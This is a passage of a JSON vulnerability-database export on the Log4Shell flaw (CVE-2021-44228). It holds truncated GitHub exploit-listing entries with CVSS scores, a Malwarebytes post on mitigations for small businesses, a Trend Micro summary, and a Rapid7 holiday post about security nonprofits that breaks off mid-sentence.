"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:08:25", "description": "# CVE-2021-44228 PoC\n\nPoC for CVE-2021-44228. 
\n\nProject made for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T23:40:39", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T15:29:24", "id": "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T17:08:26", "description": "<h1>log4j</h1>\n<h4>An automated heade...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:15:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T15:10:52", "id": "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-15T09:25:50", "description": "# CVE-2021-44228 in Minecraft\n- Java 16\n- Paper server build #39...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T11:22:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2022-02-15T06:41:00", "id": "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T09:04:38", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-11T19:11:12", "description": "# log4fix\nThis tool is to detect and fix the log4j log4shell vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T11:54:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T08:26:51", "id": "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-25T02:36:25", "description": "# Searchable Log4j database\n Searchable page for [CISA Log4j (CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T03:37:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T00:10:31", "id": "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:49:34", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "7948E878-9BFE-5FEB-90AE-14C32290452F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-04T23:11:42", "description": "# Log4Shell Honeypot\n\nDockerized honeypot for [CVE-2021-44228](h...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T21:09:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T20:43:53", "id": "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "malwarebytes": [{"lastseen": "2021-12-16T12:38:51", "description": "As you may already know, the business, tech, and cybersecurity industries have been buzzing about Log4Shell (_[CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)_), aka Logjam, the latest software flaw in an earlier version of the Apache Log4j logging utility. As the name suggests, a logger is a piece of software that logs every event that happens in a computer system. 
The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nUnderstandably, this may be the first time you've been told explicitly about the Log4j tool, but what many don\u2019t realize is that hundreds of millions of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, rely on it. The software and online services you use in your business may be Java-based, too, thus opening you up for possible exploitation.\n\nExploiting this flaw allows hackers to worm their way into unpatched systems to take control. It\u2019s seriously bad to have this on any endpoint because of its ultra-wide attack surface and the accompanying damage potential that it could bring.\n\n> Probably the worst since Heartbleed, I would say. \n> \n> The attack surface is incredibly broad.\n> \n> -- April King  (@CubicleApril) [December 10, 2021](<https://twitter.com/CubicleApril/status/1469435234462703619?ref_src=twsrc%5Etfw>)\n\n* * *\n\nRead everything you need to know about Log4Shell in our blog post, \n[_\u201cLog4j zero-day \u2018Log4Shell\u2019 arrives just in time to ruin your weekend.\u201d_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>)\n\n* * *\n\nBecause of all of this, there is a great need for businesses, particularly SMBs, to protect themselves against threats that take advantage of the Log4Shell vulnerability. 
Most certainly now that _[Microsoft has started seeing](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>)_ underground groups it dubs "access brokers," those exploiting Log4Shell to infiltrate and gain initial access to target company networks in the hopes of selling that access to ransomware threat actors.\n\nAccording to the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft 365 Defender Threat Intelligence Team, "We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms."\n\nRansomware is not the only concern here. Threat actors can also install [_cryptominers_](<https://blog.malwarebytes.com/glossary/miner/>), malware that turns devices into bots and makes them part of a [botnet](<https://blog.malwarebytes.com/glossary/botnet/>)\u2014which Mirai [bot herders](<https://blog.malwarebytes.com/glossary/bot-herder/>) _[have already started doing](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>)_\u2014and [_Cobalt Strike_](<https://blog.malwarebytes.com/glossary/cobalt-strike/>), which cybercriminals abuse to perform network surveillance.\n\n### How can SMBs protect themselves from Log4j-enabled attacks?\n\nSMBs that use Linux can start off by checking if the version of the platform they are using is affected. TechRepublic published _[a nifty guide](<https://www.techrepublic.com/article/how-to-test-if-your-linux-server-is-vulnerable-to-log4j/>)_ on just how to do that. \n\nSMB Windows users, on the other hand, should expect to be vulnerable as Microsoft uses Java-based apps in its products. 
The company has provided lengthy guidance on the matter of Log4j _[here](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>)_, which it has regularly updated with observations on criminal movement involving the abuse of the Log4Shell flaw. It is essential to continuously return to that blog post for updates.\n\nOnce you have determined that your platform is impacted by Log4Shell, you must upgrade to the latest version of Apache Log4j, which is _[2.15.0](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>)_. If you\u2019re using versions between 2.10 and 2.14.1 but can\u2019t update to the newest version yet, RiskIQ _[advises](<https://community.riskiq.com/article/505098fc>)_ organizations to change the following JVM parameter value to "true" and restart the Java process:\n \n \n -DLog4j2.formatMsgNoLookups=true\n\n"Organizations who are unclear where to include this parameter must check the documentation of the related Java project/product in use for the correct place," the company further advises. "Alternatively, they may set the LOG4J_FORMAT_MSG_NO_LOOKUPS="true" environment variable to force this change. 
Kubernetes deployments may use this environment variable approach to set it across Kubernetes clusters, effectively reflecting on all pods and containers automatically."\n\nFinally, the Cybersecurity & Infrastructure Security Agency (CISA) encourages users and business administrators to visit and review this _[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>)_ page to apply other recommended mitigation steps as soon as possible.\n\nThe post [What SMBs can do to protect against Log4Shell attacks](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T20:59:31", "type": "malwarebytes", "title": "What SMBs can do to protect against Log4Shell attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T20:59:31", "id": "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2021-12-14T10:37:12", "description": "Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:00:00", "type": "trendmicroblog", "title": "Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:00:00", "id": "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "href": "https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-04T19:05:16", 
"description": "\n\n_**Editor\u2019s note: **We had planned to publish our _[_Hacky Holidays_](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>)_ blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nWhile it's always nice to receive gifts, the holiday season is more about giving \u2013 whether you're buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.\n\nGiving back is exactly what we'll be focusing on in today's [Hacky Holidays](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>) post, as it's a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we've highlighted a few security-related projects that exemplify the spirit of giving back.\n\n## 1\\. The Innocent Lives Foundation\n\n[The Innocent Lives Foundation](<https://www.innocentlivesfoundation.org/>) aims to identify child predators and help bring them to justice. They do this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. 
Then, using the data from Open Source Intelligence and cutting-edge techniques, they build a path to capturing evidence and then pass on those details to law enforcement for them to recreate.\n\nThe Innocent Lives Foundation was first started by Chris Hadnagy, who [joined us on an episode of our Security Nation podcast](<https://www.rapid7.com/blog/post/2020/01/30/how-the-innocent-lives-foundation-uses-osint-to-uncover-predators/>) back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.\n\nThe foundation is serving endangered children and building a world in which all children can live innocent lives. It's difficult, emotionally taxing work, but it's making the world a better place, and it's the perfect example of giving back.\n\nIf you'd like to donate to the cause \u2014 it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed \u2014 you can do so [here](<https://www.innocentlivesfoundation.org/donate/>). Aside from donating, there are numerous other ways to [get involved](<https://www.innocentlivesfoundation.org/get-involved/>), including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.\n\n## 2\\. No More Ransom\n\nToday, ransomware is rampant. This fact won't surprise anyone working in the security industry, but many normal users around the world don't know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. 
That's where [No More Ransom](<https://www.nomoreransom.org/en/index.html>) comes into play.\n\nNo More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands' police, Europol's European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.\n\nThe initiative aims to achieve this mission in two ways:\n\n 1. By compiling a [repository of keys and applications](<https://www.nomoreransom.org/en/decryption-tools.html>) that can decrypt data locked by different types of ransomware\n 2. By [spreading awareness about ransomware](<https://www.nomoreransom.org/en/ransomware-qa.html>) and educating the world about prevention methods they can employ in their daily lives\n\nWhile it's not always possible to regain access to files encrypted or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better informed world of users who understand how to prevent falling victim to ransomware in the first place.\n\nIn the 5 years since its creation, the [No More Ransom initiative](<https://www.rapid7.com/blog/post/2021/07/26/decrypter-fomo-no-mo-five-years-of-the-no-more-ransom-project/>) has:\n\n * Built a library of 121 free tools\n * Been able to decrypt 151 ransomware families\n * Seen more than 6 million downloads of its tools\n * Prevented $900 million in criminal profit\n\nIf you'd like to do your part, the No More Ransom project is always looking for [new partners](<https://www.nomoreransom.org/en/partners.html>) to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. 
If you ever fall victim to ransomware, you can also [report the crime](<https://www.nomoreransom.org/en/report-a-crime.html>), which will help identify new types of ransomware and aid future prevention.\n\n## 3\\. CIAS Gaming\n\nEstablished by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming \u2014 and as part of their work, they're making cybersecurity relatable, fun, and engaging for kids.\n\nThe [CIAS Gaming program](<https://cias.utsa.edu/gaming.php>) targets 4 demographics: elementary school, middle school, high school, and colleges and universities. Their mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.\n\nCurrently, the CIAS K-12 Program consists of a few educational tools. These include:\n\n * A collectible card game and electronic download called [Cyber Threat Defender](<http://cias.utsa.edu/ctd_cards.php>)\n * A multiplayer card game for students in third through fifth grade called [Cyber Threat Protector](<https://cias.utsa.edu/protector.php>)\n * A card game for K-2 players with simple design and reinforced concepts called [Cyber Threat Guardian](<https://cias.utsa.edu/guardian.php>)\n * An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called [Project Cipher](<http://cias.utsa.edu/cipher.php>)\n * A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the [Pyramid of Knowledge](<http://cias.utsa.edu/pyramid.php>)\n * Interactive activities, like activity sheets and games, introduced to kids by the [CyBear cybersecurity mascots](<https://www.cultureofcybersecurity.com/>)\n\nCIAS Gaming is shaping the future of cybersecurity by training the 
next generation in cybersecurity best practices. You can access and download these tools and games via the links above, or [reach out](<https://cias.utsa.edu/contact.html>) directly to CIAS to learn more about taking part in their competitions or trainings.\n\n## 4\\. The Alliance for Securing Democracy\n\nThe [Alliance for Securing Democracy](<https://securingdemocracy.gmfus.org/>) (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.\n\nThe ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.\n\nThe ASD has conducted a significant amount of work in the area of [cybersecurity](<https://securingdemocracy.gmfus.org/cybersecurity/>). It also has compiled a toolbox to spread awareness on various techniques being used by malign actors. 
Such tools include:\n\n * [The Authoritarian Interference Tracker](<https://securingdemocracy.gmfus.org/toolbox/authoritarian-interference-tracker/>), which exposes Russia and China's foreign interference activities\n * [The Information Operations Archive](<https://www.io-archive.org/>), which houses data points from known Information Operations\n * [The Hamilton 2.0 Dashboard](<https://securingdemocracy.gmfus.org/hamilton-dashboard/>), which reveals autocracies' state-backed messaging\n\nIn a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at [info@securingdemocracy.org](<mailto:info@securingdemocracy.org>) or [donate to the cause](<https://contributions.gmfus.org/ASD-Donations>).\n\n## 5\\. Code for Social Good\n\n[Code for Social Good](<https://app.code4socialgood.org/>) is a nonprofit organization that partners with other nonprofit companies to provide the technical help they need to achieve their missions for no cost. It's all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. And that global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.\n\nWhether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. 
Anyone can [sign up](<https://c4sg.auth0.com/login?state=hKFo2SBKaXJWNm4tTWNhQmNTSl9ER2V3Q2h3eHJTRXRHdVpuWKFupWxvZ2luo3RpZNkgMGw5cTQ1OFhyVUhzZkhWa1M2X0hvT3ZsZTNjUFpHNjmjY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) as a volunteer, and then, you can browse their [list of projects](<https://app.code4socialgood.org/project/list/projects>). If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. Nonprofits that need help can also [post projects](<https://c4sg.auth0.com/login?state=hKFo2SAxYndhbFFlWENNM3RmYXozb1U5RHhtaHgtSHNteWJlaaFupWxvZ2luo3RpZNkgNHlWZ1MyUGpMeDhRRGdKUzRhRTFGZXNadjktdTRsSTijY2lk2SAzMzJEWkFRaVVpWEFYWVlLdnpKeTZFb2R5bFMycnplNQ&client=332DZAQiUiXAXYYKvzJy6EodylS2rze5&protocol=oauth2&response_type=token&scope=openid%20profile%20email%20scope&audience=https%3A%2F%2Fc4sg-api&envars=prod&auth0Client=eyJuYW1lIjoiYXV0aDAuanMiLCJ2ZXJzaW9uIjoiOC44LjAifQ%3D%3D>) on the site and [find volunteers](<https://app.code4socialgood.org/user/list>) to assist them.\n\nAs of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they're always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.\n\nGiving back is an important theme of the holidays and one that's integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.\n\nIf you're looking for ways to give back, hopefully these 